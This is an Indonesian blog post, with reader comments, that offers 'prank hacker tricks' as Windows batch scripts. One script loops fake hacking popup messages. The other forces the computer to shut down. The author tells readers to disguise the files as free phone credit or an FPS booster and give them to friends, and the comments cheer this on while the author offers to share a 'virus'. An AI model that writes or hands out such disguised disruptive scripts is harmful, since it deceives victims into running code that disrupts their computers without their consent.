-->

Selasa, 04 Agustus 2015

Trik Tips Hacker hanya dengan Notepad.

Hello guys, Good afternoon. How are tou today? (( cieelah pake bahasa inggris :v ))
Yo kali ini saya "Muhammad Bagus Icfan" akan sharing beberapa Script yang bikin temen kesel.
Awakwawak :D Greget deh, tapi jangan sampai ketawan yak :D

Mari di baca dan di Simak.

1. Seperti biasa, Buka notepad anda (( Klik start - ketik "Notepad" ))

2. Lalu copy Script berikut.

@ECHO off

color 2

:Begin
title THIS'S IDT999.BLOGSPOT.com
echo Now i will hack your Computer!!
echo Hack by : "Muhammad Bagus Icfan"
GOTO BEGIN

:Begin
msg * E'y bro!!
msg * This's Hacker Professional!!
msg * I will hack your CPU!!
msg * If you want this end, you must Reinstall OS!!
msg * If you already Reinstall OS, your problem solved!!
msg * Hacking Process!!!!
msg * Hacking Process!!!!
msg * Hacking Process!!!!
msg * Hacking Process!!!!
msg * Hacking Process!!!!
msg * Hacking Process!!!!
msg * Hacking Process!!!!
msg * THIS'S TROLL!!!! :D
GOTO BEGIN

IDT999.BLOGSPOT.COM

Itu adalah Script mengirim pesan secara otomatis, dan tidak dapat di hilangkan messagenya :D
Salah satu cara menghilangkan Script tersebut adalah hilangkan command tersebut, baru Message akan berhenti. Ohiya, Notepadnya di save dengan format .bat yak. Contoh : ( Pulsagratis.bat ) nanti kamu buat Zip lalu kasih ketemen kamu deh :D Aahahahah.
"Selanjutnya Script yang paling greget, temen kamu pasti kesel banget :D Mari di baca dan di perhatikan"

1. Seperti biasa Notepad :D

2. Lalu copy Script berikut ini.

@echo off
color 2
msg * This's hacker. Your computer will corrupt By : IDT999.BLOGSPOT.COM
shutdown -c "Error! You are too ******!" -s

3. Setelah itu save dengan format .bat . Contoh : ( FPSUP.bat ) bilang aja ke temenmu ini software buat naikin FPS game :D Ahahaha.


  • GA PAKE SS soalnya kalo gua coba entar Laptop gue mati :v
Ya segitu dulu yak beberapa Script jahil dari gue, itu gua juga baru belajar :D
Nanti aku updates lagi deh :* Semoga sukses ya ngejahilinnya :D







26 komentar :

  1. Nice and thanks articles and info:)
    Greetings BlogWalker!

    BalasHapus
    Balasan
    1. Yo makasih bro, praktekin sekalian bro=)) #Cmiw

      Hapus
  2. manteps ... pernah ane coba... dikira kompi ane rusak sama temen ane ... hahhahaha

    BalasHapus
    Balasan
    1. Ahahaha, hati-hati bro :D Terkadang yang berformat bat, vbs, dll. itu berbahaya :v :D Di preview dulu makanya bro sebelum di buka :D

      Hapus
  3. Takut gan . Nanti pc jadi hang.
    Apa itu memakan RAM banyyak??
    Jgn lupa ya baca juga Gitaris keren asal Indonesia!

    BalasHapus
    Balasan
    1. Engga kok bro, ga memakan RAM. itu hanya menggunakan notepad. di coba aja bro:D Kasih deh ke temenmu.

      Hapus
  4. Balasan
    1. Ahaha biasa aja bro, lagi pula itu masih yang biasa :v bukan yang PRO, mau aku share ga buat Virus?

      Hapus
  5. terimakasih gan ;) dapat sedikit pembelajaran tentang hacker tapi yang tepat trick :D makasih banget nih

    BalasHapus
    Balasan
    1. Ahaha yoi bro sama-sama ;) Praktekin bro :D Biar greget :v

      Hapus
  6. Mantap nih buat jail in tmn :D hehehe , thx sob

    BalasHapus
    Balasan
    1. Yo sama-sama bro :D Mari di praktekan :v biar temenmu kesal :D Textnya kamu ganti aja yak sesukamu :D

      Hapus
  7. Waduh srem jg gan, salah2 nanti pc ane yg error :D hehe
    nice info gan ;)

    salam clickindo.com

    BalasHapus
    Balasan
    1. Ahahaha, yo bro sama-sama :D Ada pepatah mengatakan, "Jangan pernah takut sebelum mencoba" :v ayo bro cobain lah :D Kan greget :v

      Hapus
  8. Bah! Ini bisa mewujudkan cita-cita kecil untuk untuk jadi Hacker :p

    BalasHapus
  9. wah bisa juga nih :D izin bookmark dulu (y)

    BalasHapus
  10. Anjir bikin orang kesel nih :3 ane cobaaaaaa

    BalasHapus
    Balasan
    1. Ahahha oke bro silahkan :D Praktekin ke temenmu :v

      Hapus
  11. haha, belajar nge troll ala hacker :v
    ane coba dulu gan :D (y)

    BalasHapus
  12. hahaha,nice info gan,kalau ada waktu ane coba deh :D

    BalasHapus
  13. Kereeeen, nice info, boleh dicoba kan ??? :)

    BalasHapus
    Balasan
    1. Ahaha silahkan broo ;) Semoga berhasil :v

      Hapus